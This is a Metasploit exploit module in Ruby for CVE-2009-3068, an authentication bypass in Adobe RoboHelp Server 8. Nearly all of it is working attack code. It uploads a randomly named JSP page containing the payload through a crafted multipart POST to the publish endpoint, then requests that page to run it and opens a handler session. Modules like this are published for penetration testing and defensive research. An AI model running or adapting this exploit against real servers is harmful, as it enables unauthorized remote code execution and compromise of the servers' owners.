Adobe RoboHelp Server 8 - Arbitrary File Upload and Execute



##

# $Id: adobe_robohelper_authbypass.rb 11127 2010-11-24 19:35:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Adobe RoboHelp Server 8 Arbitrary File Upload and Execute',
            'Description'    => %q{
                    This module exploits an authentication bypass vulnerability which
                allows remote attackers to upload and execute arbitrary code.
            },
            'Author'         => [ 'MC' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 11127 $',
            'Platform'       => 'win',
            'Privileged'     => true,
            'References'     =>
                [
                    [ 'CVE', '2009-3068' ],
                    [ 'OSVDB', '57896'],
                    [ 'URL', 'http://www.intevydis.com/blog/?p=69' ],
                    [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-066' ],
                ],
            'Targets'        =>
                [
                    [ 'Universal Windows Target',
                        {
                            'Arch'     => ARCH_JAVA,
                            'Payload'  =>
                                {
                                    'DisableNops' => true,
                                },
                        }
                    ],
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Sep 23 2009'
        ))

        register_options( [ Opt::RPORT(8080) ], self.class )
    end

    def exploit

        page = Rex::Text.rand_text_alpha_upper(8) + ".jsp"
        uid  = rand(20).to_s

        file =  "-----------------------------#{uid}\r\n"
        file << "Content-Disposition: form-data; name=\"filename\"; filename=\"#{page}\"\r\n"
        file << "Content-Type: application/x-java-archive\r\n\r\n"
        file << payload.encoded
        file << "\r\n"

        print_status("Sending our POST request...")

        res = send_request_cgi(
            {
                'uri'        => '/robohelp/server?PUBLISH=' + uid,
                'version'    => '1.1',
                'method'    => 'POST',
                'data'        => file,
                'headers'    =>
                    {
                        'Content-Type'        => 'multipart/form-data; boundary=---------------------------' + uid,
                        'UID'            => uid,
                    }
            }, 5)

        if ( res and res.message =~ /OK/ )
            id = res['sessionid'].to_s.strip

            print_status("Got sessionid of '#{id}'. Sending our second request to '#{page}'...")
            data = send_request_raw({
                    'uri'        => '/robohelp/robo/reserved/web/' + id + '/' + page ,
                    'method'    => 'GET',
                    'version'    => '1.0',
            }, 5)

            handler
        else
            print_error("No SESSIONID acquired...")
            return
        end
    end
end